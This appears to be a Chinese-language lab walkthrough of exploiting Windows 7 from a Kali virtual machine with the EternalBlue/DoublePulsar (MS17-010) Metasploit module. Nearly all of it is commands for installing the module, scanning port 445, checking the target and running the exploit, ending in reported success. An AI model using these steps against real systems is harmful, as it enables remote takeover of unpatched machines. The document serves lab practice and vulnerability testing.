准備階段:
1,原版windows7:cn_windows_7_enterprise_x86_dvd_x15-70737.iso
2,kali系統, 虛擬機
3,用於32位機的攻擊模塊:Eternalblue-Doublepulsar
1>克隆到root目錄下:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
2>拷貝包內的:eternalblue_doublepulsar 至
/usr/share/metasploit-framework/modules/exploits/windows/smb/下
並更新msf 命令:reload_all
3>在windows7開啟445端口(防火牆為開啟)
4>nmap掃描:nmap -p445 -sS -A 192.168.132.133
開始測試:
1>
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.132.133
msf auxiliary(scanner/smb/smb_ms17_010) > run (發現存在漏洞)
2>
msf > use windows/smb/eternalblue_doublepulsar
msf exploit(windows/smb/eternalblue_doublepulsar) > show options
msf exploit(windows/smb/eternalblue_doublepulsar) > set RHOST 192.168.132.133
msf exploit(windows/smb/eternalblue_doublepulsar) > run //報一錯誤 運行 wine -h即可
3>
再次運行,成功!
—————————————————————————結束———————————————————————————